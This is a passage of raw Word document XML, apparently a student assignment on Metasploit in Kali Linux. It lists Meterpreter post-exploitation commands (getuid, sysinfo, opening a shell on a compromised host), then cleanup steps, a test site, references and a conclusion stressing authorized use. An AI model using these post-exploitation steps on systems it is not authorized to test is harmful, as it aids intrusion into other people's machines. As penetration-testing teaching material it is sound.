      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>getuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00876F10" w:rsidRDefault="00876F10" w:rsidP="00876F10">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Gather system details:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00876F10" w:rsidRDefault="00876F10" w:rsidP="00876F10">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>sysinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00876F10" w:rsidRDefault="00876F10" w:rsidP="00876F10">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Access the command shell of the compromised system:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00876F10" w:rsidRDefault="00876F10" w:rsidP="00876F10">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00876F10" w:rsidRDefault="00876F10" w:rsidP="00876F10">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t>These post-exploitation actions help in further analysis and penetration testing.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00876F10" w:rsidRDefault="00876F10" w:rsidP="00876F10">
      <w:r>
        <w:pict>
          <v:rect id="_x0000_i1031" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00876F10" w:rsidRPr="0064140D" w:rsidRDefault="00876F10" w:rsidP="00876F10">
      <w:pPr>
        <w:pStyle w:val="Heading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140D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4.7 Cleanup and Exit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00876F10" w:rsidRDefault="00876F10" w:rsidP="00876F10">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t>To ensure ethical usage and prevent unintended consequences, proper cleanup is necessary.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00876F10" w:rsidRDefault="00876F10" w:rsidP="00876F10">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Exit </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> session:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00876F10" w:rsidRDefault="00876F10" w:rsidP="00876F10">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; exit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00876F10" w:rsidRDefault="00876F10" w:rsidP="00876F10">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t>Terminate all active sessions:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00876F10" w:rsidRDefault="00876F10" w:rsidP="00876F10">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>sessions</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t xml:space="preserve"> -K</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00876F10" w:rsidRDefault="00876F10" w:rsidP="00876F10">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Stop the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> services:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00876F10" w:rsidRDefault="00876F10" w:rsidP="00876F10">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>service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postgresql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t xml:space="preserve"> stop</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00876F10" w:rsidRDefault="00876F10" w:rsidP="00876F10">
      <w:r>
        <w:pict>
          <v:rect id="_x0000_i1032" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00876F10" w:rsidRDefault="00876F10" w:rsidP="00876F10">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5. Submission of Code Repository</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F9604B" w:rsidRPr="0064140D" w:rsidRDefault="00F9604B" w:rsidP="00DB3A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:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0064140D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:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GitHub</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0064140D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:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> repository link</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0064140D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:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00166352" w:rsidRPr="0064140D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:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00DB3A66" w:rsidRPr="004D2A4B" w:rsidRDefault="007223C4" w:rsidP="00DB3A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6</w:t>
      </w:r>
      <w:r w:rsidR="00DB3A66" w:rsidRPr="004D2A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. Example Site for Testing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB3A66" w:rsidRPr="004D2A4B" w:rsidRDefault="00DB3A66" w:rsidP="00DB3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4D2A4B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A sample vulnerable web application for testing: </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidR="005C4E1C" w:rsidRPr="004D2A4B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val="en-US"/>
          </w:rPr>
          <w:t>http://www.itsecgames.com/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00521275" w:rsidRPr="004D2A4B" w:rsidRDefault="00521275" w:rsidP="00DB3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4D2A4B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/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5731510" cy="2705735"/>
            <wp:effectExtent l="19050" t="0" r="2540" b="0"/>
            <wp:docPr id="1" name="Picture 0" descr="Screenshot 2025-02-17 220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17 22030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AC" w:rsidRPr="004D2A4B" w:rsidRDefault="007223C4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</w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidR="003D26D1" w:rsidRPr="004D2A4B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</w:rPr>
        <w:t>.References</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="003D26D1" w:rsidRPr="004D2A4B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</w:rPr>
        <w:t xml:space="preserve"> :</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D26D1" w:rsidRPr="000838C4" w:rsidRDefault="000946A4" w:rsidP="005C73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Pr="000838C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https://medium.com/@nickhandy/kali-linux-metasploit-getting-started-with-pen-testing-89d28944097b</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="000946A4" w:rsidRDefault="005C73D2" w:rsidP="005C73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Pr="000838C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https://youtu.be/K7y_-JtpZ7I?si=GZXyKjAPVJFjuR2l</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="009A62F6" w:rsidRDefault="009A62F6" w:rsidP="008B5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</w:p>
    <w:p w:rsidR="008B5658" w:rsidRPr="008B5658" w:rsidRDefault="008B5658" w:rsidP="008B5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8B5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lastRenderedPageBreak/>
        <w:t>8. Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B5658" w:rsidRPr="008B5658" w:rsidRDefault="008B5658" w:rsidP="008B5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B5658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This document demonstrates the theoretical foundation and practical implementation of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008B5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Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008B5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 on Kali Linux</w:t>
      </w:r>
      <w:r w:rsidRPr="008B5658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. By following these structured steps, security professionals and ethical hackers can effectively conduct penetration testing, identify vulnerabilities, and analyze system security. However, it is important to use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008B5658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Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008B5658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responsibly and only for authorized security assessments.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C73D2" w:rsidRPr="004D2A4B" w:rsidRDefault="005C73D2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="005C73D2" w:rsidRPr="004D2A4B" w:rsidSect="00106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6794D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="38E8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11B98"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BB8A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B258D5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="813C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B3A66"/>
    <w:rsid w:val="00047FC0"/>
    <w:rsid w:val="000838C4"/>
    <w:rsid w:val="000946A4"/>
    <w:rsid w:val="0010637B"/>
    <w:rsid w:val="00113A62"/>
    <w:rsid w:val="00166352"/>
    <w:rsid w:val="001C3EA4"/>
    <w:rsid w:val="003D26D1"/>
    <w:rsid w:val="004D2A4B"/>
    <w:rsid w:val="004E4C92"/>
    <w:rsid w:val="00521275"/>
    <w:rsid w:val="00555D16"/>
    <w:rsid w:val="005C4E1C"/>
    <w:rsid w:val="005C73D2"/>
    <w:rsid w:val="0064140D"/>
    <w:rsid w:val="0069336F"/>
    <w:rsid w:val="007223C4"/>
    <w:rsid w:val="00814AFC"/>
    <w:rsid w:val="00876F10"/>
    <w:rsid w:val="008B5658"/>
    <w:rsid w:val="008D29D3"/>
    <w:rsid w:val="0090369E"/>
    <w:rsid w:val="0094227A"/>
    <w:rsid w:val="00987D8F"/>
    <w:rsid w:val="009A62F6"/>
    <w:rsid w:val="00AC3CAC"/>
    <w:rsid w:val="00AD4AF3"/>
    <w:rsid w:val="00C746E2"/>
    <w:rsid w:val="00D31D43"/>
    <w:rsid w:val="00DB3A66"/>
    <w:rsid w:val="00DC5F13"/>
    <w:rsid w:val="00E5332F"/>
    <w:rsid w:val="00EA737F"/>
    <w:rsid w:val="00F9604B"/>
    <w:rsid w:val="00FC35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37B"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Heading2Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00DB3A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DB3A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F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3A66"/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B3A66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DB3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B3A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A66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B3A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B3A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3A66"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00DB3A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1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27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F10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6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nickhandy/kali-linux-metasploit-getting-started-with-pen-testing-89d28944097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secgames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K7y_-JtpZ7I?si=GZXyKjAPVJFjuR2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Soumil</dc:creator>
  <cp:lastModifiedBy>Soumil</cp:lastModifiedBy>
  <cp:revision>30</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-02-17T16:33:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-02-17T16:56:00Z</dcterms:modified>
</cp:coreProperties>
</file>